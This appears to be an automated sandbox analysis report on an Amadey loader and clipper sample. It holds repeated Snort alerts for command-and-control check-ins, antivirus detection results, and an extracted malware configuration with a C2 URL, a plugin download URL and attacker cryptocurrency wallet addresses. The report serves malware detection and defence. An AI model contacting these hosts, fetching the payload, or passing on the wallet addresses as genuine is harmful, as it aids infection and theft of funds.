                              Timestamp:192.168.2.762.204.41.449846802027700 02/07/23-23:07:41.490813
                              SID:2027700
                              Source Port:49846
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450003802027700 02/07/23-23:08:25.325125
                              SID:2027700
                              Source Port:50003
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450174802027700 02/07/23-23:09:11.713080
                              SID:2027700
                              Source Port:50174
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449711802027700 02/07/23-23:07:05.695210
                              SID:2027700
                              Source Port:49711
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450190802027700 02/07/23-23:09:15.591790
                              SID:2027700
                              Source Port:50190
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450404802027700 02/07/23-23:10:10.231347
                              SID:2027700
                              Source Port:50404
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449965802027700 02/07/23-23:08:13.650116
                              SID:2027700
                              Source Port:49965
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450293802027700 02/07/23-23:09:43.101385
                              SID:2027700
                              Source Port:50293
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450211802027700 02/07/23-23:09:20.794111
                              SID:2027700
                              Source Port:50211
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449784802027700 02/07/23-23:07:24.915414
                              SID:2027700
                              Source Port:49784
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450437802027700 02/07/23-23:10:20.219041
                              SID:2027700
                              Source Port:50437
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450460802027700 02/07/23-23:10:25.826616
                              SID:2027700
                              Source Port:50460
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449859802027700 02/07/23-23:07:44.659899
                              SID:2027700
                              Source Port:49859
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450187802027700 02/07/23-23:09:14.862061
                              SID:2027700
                              Source Port:50187
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450105802027700 02/07/23-23:08:52.555967
                              SID:2027700
                              Source Port:50105
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450302802027700 02/07/23-23:09:45.325485
                              SID:2027700
                              Source Port:50302
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450229802027700 02/07/23-23:09:25.211609
                              SID:2027700
                              Source Port:50229
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449890802027700 02/07/23-23:07:52.300017
                              SID:2027700
                              Source Port:49890
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450141802027700 02/07/23-23:09:01.548249
                              SID:2027700
                              Source Port:50141
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450395802027700 02/07/23-23:10:08.061097
                              SID:2027700
                              Source Port:50395
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450224802027700 02/07/23-23:09:23.949840
                              SID:2027700
                              Source Port:50224
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449771802027700 02/07/23-23:07:21.708262
                              SID:2027700
                              Source Port:49771
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449895802027700 02/07/23-23:07:53.534084
                              SID:2027700
                              Source Port:49895
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449813802027700 02/07/23-23:07:31.831966
                              SID:2027700
                              Source Port:49813
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450194802027700 02/07/23-23:09:16.621524
                              SID:2027700
                              Source Port:50194
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450292802027700 02/07/23-23:09:42.847678
                              SID:2027700
                              Source Port:50292
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449903802027700 02/07/23-23:07:56.006891
                              SID:2027700
                              Source Port:49903
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450424802027700 02/07/23-23:10:15.140263
                              SID:2027700
                              Source Port:50424
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449814802027700 02/07/23-23:07:32.080927
                              SID:2027700
                              Source Port:49814
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450289802027700 02/07/23-23:09:42.121099
                              SID:2027700
                              Source Port:50289
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450035802027700 02/07/23-23:08:33.151525
                              SID:2027700
                              Source Port:50035
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450068802027700 02/07/23-23:08:43.057010
                              SID:2027700
                              Source Port:50068
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449912802027700 02/07/23-23:08:00.559985
                              SID:2027700
                              Source Port:49912
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450010802027700 02/07/23-23:08:27.035129
                              SID:2027700
                              Source Port:50010
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450362802027700 02/07/23-23:10:00.086376
                              SID:2027700
                              Source Port:50362
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449909802027700 02/07/23-23:07:59.832613
                              SID:2027700
                              Source Port:49909
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450335802027700 02/07/23-23:09:53.466997
                              SID:2027700
                              Source Port:50335
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449899802027700 02/07/23-23:07:54.525689
                              SID:2027700
                              Source Port:49899
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449997802027700 02/07/23-23:08:23.882401
                              SID:2027700
                              Source Port:49997
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449870802027700 02/07/23-23:07:47.398418
                              SID:2027700
                              Source Port:49870
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450273802027700 02/07/23-23:09:38.220730
                              SID:2027700
                              Source Port:50273
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449833802027700 02/07/23-23:07:36.871624
                              SID:2027700
                              Source Port:49833
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450049802027700 02/07/23-23:08:38.401506
                              SID:2027700
                              Source Port:50049
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449998802027700 02/07/23-23:08:24.116921
                              SID:2027700
                              Source Port:49998
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450138802027700 02/07/23-23:09:00.761131
                              SID:2027700
                              Source Port:50138
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450204802027700 02/07/23-23:09:19.062253
                              SID:2027700
                              Source Port:50204
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449839802027700 02/07/23-23:07:39.819277
                              SID:2027700
                              Source Port:49839
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449928802027700 02/07/23-23:08:04.507544
                              SID:2027700
                              Source Port:49928
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450405802027700 02/07/23-23:10:10.475956
                              SID:2027700
                              Source Port:50405
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449715802027700 02/07/23-23:07:06.670721
                              SID:2027700
                              Source Port:49715
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450306802027700 02/07/23-23:09:46.316046
                              SID:2027700
                              Source Port:50306
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449791802027700 02/07/23-23:07:26.598224
                              SID:2027700
                              Source Port:49791
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450220802027700 02/07/23-23:09:22.982035
                              SID:2027700
                              Source Port:50220
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450223802027700 02/07/23-23:09:23.700905
                              SID:2027700
                              Source Port:50223
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450477802027700 02/07/23-23:10:29.999028
                              SID:2027700
                              Source Port:50477
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450125802027700 02/07/23-23:08:57.600771
                              SID:2027700
                              Source Port:50125
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450217802027700 02/07/23-23:09:22.244329
                              SID:2027700
                              Source Port:50217
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450036802027700 02/07/23-23:08:33.388754
                              SID:2027700
                              Source Port:50036
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450134802027700 02/07/23-23:08:59.789777
                              SID:2027700
                              Source Port:50134
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450388802027700 02/07/23-23:10:06.372796
                              SID:2027700
                              Source Port:50388
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450391802027700 02/07/23-23:10:07.091832
                              SID:2027700
                              Source Port:50391
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450474802027700 02/07/23-23:10:29.268969
                              SID:2027700
                              Source Port:50474
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450181802027700 02/07/23-23:09:13.403025
                              SID:2027700
                              Source Port:50181
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450408802027700 02/07/23-23:10:11.262817
                              SID:2027700
                              Source Port:50408
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449925802027700 02/07/23-23:08:03.782317
                              SID:2027700
                              Source Port:49925
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450092802027700 02/07/23-23:08:49.011979
                              SID:2027700
                              Source Port:50092
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected


                              AV Detection

                              Source: 62.204.41.4/Gol478Ns/index.php, Avira URL Cloud: Label: malware
                              Source: http://62.204.41.4/Gol478Ns/index.php, Avira URL Cloud: Label: malware
                              Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll, Avira URL Cloud: Label: malware
                              Source: file.exe, ReversingLabs: Detection: 65%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, ReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, ReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe, ReversingLabs: Detection: 55%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, ReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe, ReversingLabs: Detection: 44%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe, ReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, ReversingLabs: Detection: 80%
                              Source: file.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Joe Sandbox ML: detected
                              Source: 32.0.mnolyk.exe.1b0000.0.unpack, Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                              Source: 26.2.rundll32.exe.6ec20000.0.unpack, Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                              Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_003D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_003D2F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe, Code function: 1_2_00F32F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00F32F1D

                              Compliance

                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe, Unpacked PE file: 2.2.aPsf.exe.400000.0.unpack
                              Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: wextract.pdb source: file.exe, bPsg.exe.0.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.254759313.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000E.00000000.319981682.000000000122E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000F.00000000.321061276.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000F.00000002.776375932.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000017.00000000.324442770.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000017.00000002.331617769.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.454992434.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.455530364.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000020.00000000.583556891.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000020.00000002.583854303.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000021.00000002.713071373.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000021.00000000.712358400.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.14.dr, xriv.exe.0.dr
                              Source: Binary string: Healer.pdb source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293843993.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wextract.pdbGCTL source: file.exe, bPsg.exe.0.dr
                              Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bPsg.exe, 00000001.00000003.255402987.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, bPsg.exe, 00000001.00000003.255338525.0000000004723000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.294247979.0000000000D42000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                              Source: Binary string: _.pdb source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\yoxici.pdb source: bPsg.exe, 00000001.00000003.255338525.00000000046E6000.00000004.00000020.00020000.00000000.sdmp, aPsf.exe, 00000002.00000000.255496089.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aPsf.exe.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.776435922.000000006EC2F000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.15.dr, clip64.dll.15.dr
                              Source: Binary string: Healer.pdbH5 source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293843993.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user~1\
                              Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user~1\AppData\Local\Temp\
                              Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user~1\AppData\Local\
                              Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user~1\AppData\
                              Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_003D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_003D2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe, Code function: 1_2_00F32390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F32390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Code function: 14_2_0121FC58 FindFirstFileExW,14_2_0121FC58

                              Networking

                              Source: Traffic, Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49694 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49894 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49895 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49896 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49897 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49898 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49899 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49900 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49901 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49902 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49903 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49904 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49905 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49906 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49907 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49908 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49909 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49910 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49911 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49912 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49913 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49914 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49915 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49916 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49917 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49918 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49919 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49920 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49921 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49922 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49923 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49924 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49925 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49926 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49927 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49928 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49929 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49930 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49931 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49932 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49933 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49934 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49935 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49936 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49937 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49938 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49939 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49940 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49941 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49942 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49943 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49944 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49945 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49946 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49947 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49948 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49949 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49950 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49951 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49952 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49953 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49954 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49955 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49956 -> 62.204.41.4:80
